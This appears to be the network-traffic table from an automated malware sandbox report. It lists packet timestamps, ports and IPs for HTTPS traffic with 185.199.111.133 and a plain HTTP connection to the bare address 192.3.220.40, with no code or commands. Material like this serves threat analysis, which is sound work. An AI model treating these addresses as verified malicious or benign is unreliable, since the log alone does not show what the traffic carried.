                                                              Oct 14, 2024 11:36:13.025377035 CEST44349707185.199.111.133192.168.2.5
                                                              Oct 14, 2024 11:36:13.025407076 CEST49707443192.168.2.5185.199.111.133
                                                              Oct 14, 2024 11:36:13.025420904 CEST49707443192.168.2.5185.199.111.133
                                                              Oct 14, 2024 11:36:13.025490046 CEST44349707185.199.111.133192.168.2.5
                                                              Oct 14, 2024 11:36:13.025535107 CEST44349707185.199.111.133192.168.2.5
                                                              Oct 14, 2024 11:36:13.025567055 CEST49707443192.168.2.5185.199.111.133
Timestamp                               Source Port    Dest Port    Source IP          Dest IP
Oct 14, 2024 11:36:13.025571108 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.025603056 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.025629997 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.025677919 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.025680065 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.025691032 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.025707960 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.025749922 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.025772095 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.026326895 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.026376963 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.026406050 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.026412010 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.026437044 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.026443958 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.026494980 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.026545048 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.026575089 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.026578903 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.026608944 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.026622057 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.027169943 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.027215004 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.027239084 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.027245045 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.027275085 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.027287960 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.027785063 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.027837992 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.027873039 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.027904987 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.027926922 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.027956009 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.027970076 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.028008938 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.028036118 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.028042078 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.028070927 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.028081894 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.028825045 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.028872013 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.028908968 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.028918028 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.028939009 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.028959990 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.028971910 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.029021025 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.029048920 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.029053926 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.029083967 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.029097080 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.029386997 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.029427052 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.029462099 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.029468060 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.029488087 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.029508114 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.029576063 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.029616117 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.029642105 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.029648066 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.029678106 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.029685974 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.030359030 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.030405998 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.030437946 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.030443907 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.030471087 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.030478954 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.030500889 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.030543089 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.030566931 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.030572891 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.030605078 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.030613899 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.031045914 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.031084061 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.031116009 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.031121969 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.031146049 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.031158924 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.031204939 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.031258106 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.031286955 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.031292915 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.031322002 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.031332016 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.031943083 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.031984091 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.032013893 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.032021999 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.032040119 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.032063007 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.032550097 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.032588959 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.032629013 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.032634974 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.032651901 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.032676935 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.032732964 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.032779932 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.032819986 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.032825947 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.032839060 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.032867908 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.032877922 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.032931089 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.032959938 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.032965899 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.032994986 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.033004999 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.033521891 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.033565998 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.033596039 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.033601999 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.033629894 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.033643007 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.034035921 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.034085035 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.034113884 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.034118891 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.034147978 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.034157038 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.034228086 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.034266949 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.034297943 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.034303904 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.034332991 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.034348965 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.034365892 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.034470081 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.034499884 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.034506083 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.034528971 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.034550905 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.034954071 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.034998894 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.035027027 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.035032034 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.035062075 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.035070896 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.035264969 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.035306931 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.035339117 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.035345078 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.035362005 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.035393000 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.035509109 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.035547972 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.035581112 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.035587072 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.035605907 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.035628080 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.035644054 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.035691023 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.035717964 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.035723925 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.035753012 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.035762072 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.036299944 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.036343098 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.036371946 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.036377907 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.036396980 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.036422968 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.036637068 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.036674023 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.036700010 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.036705971 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.036730051 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.036741972 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.036839008 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.036922932 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.036935091 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.036978960 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.037009954 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.037595034 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.037633896 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.037662983 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.037669897 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.037702084 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.037770033 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.037812948 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.037847042 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.037853956 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.037877083 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.038060904 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.038098097 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.038129091 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.038135052 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.038162947 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.038235903 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.038285017 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.038314104 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.038320065 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.038351059 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.038897991 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.038935900 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.038968086 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.038974047 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.038997889 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.039081097 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.039120913 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.039148092 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.039155006 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.039186001 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.039282084 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.039319992 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.039349079 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.039355993 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.039397955 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.039510012 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.039551973 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.039578915 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.039586067 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.039621115 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.040132999 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.040172100 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.040196896 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.040205002 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.040246964 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.040371895 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.040416956 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.040447950 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.040453911 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.040468931 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.040601969 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.040647030 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.040671110 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.040678024 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.040709019 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.040802002 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.040842056 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.040868998 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.040874958 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.040903091 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.041399002 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.041444063 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.041469097 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.041475058 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.041507006 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.041764021 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.041800976 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.041826963 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.041832924 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.041853905 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.041866064 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.041888952 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.041917086 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.041922092 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.041941881 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.041949034 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.041960955 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.042000055 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.042006969 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.042022943 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.042745113 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.042768955 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.042803049 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.042809010 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.042821884 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.042843103 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.042862892 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.042901993 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.042910099 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.042920113 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.042922020 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.042972088 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.042979956 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.043008089 CEST    443            49707        185.199.111.133    192.168.2.5
Oct 14, 2024 11:36:13.043052912 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.045957088 CEST    49707          443          192.168.2.5        185.199.111.133
Oct 14, 2024 11:36:13.296722889 CEST    49708          80           192.168.2.5        192.3.220.40
                                                              Oct 14, 2024 11:36:13.301671028 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.301750898 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.301935911 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.306735039 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.818883896 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.818939924 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.818973064 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.819005966 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.819039106 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.819072008 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.819108963 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.819120884 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.819154978 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.819181919 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.819186926 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.819210052 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.819221973 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.819272041 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.824280977 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.824296951 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.824311972 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.824364901 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.871779919 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.907927036 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.908026934 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.908062935 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.908094883 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.908130884 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.908164978 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.908210039 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.908238888 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.908272982 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.908291101 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.908333063 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.908380032 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.908510923 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.908550024 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.908584118 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.908591032 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.908616066 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.908658028 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.908730984 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.909270048 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.909322977 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.909326077 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.909356117 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.909389019 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.909404993 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.909420967 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.909461021 CEST4970880192.168.2.5192.3.220.40
                                                              Oct 14, 2024 11:36:13.910301924 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.910352945 CEST8049708192.3.220.40192.168.2.5
                                                              Oct 14, 2024 11:36:13.910387039 CEST8049708192.3.220.40192.168.2.5
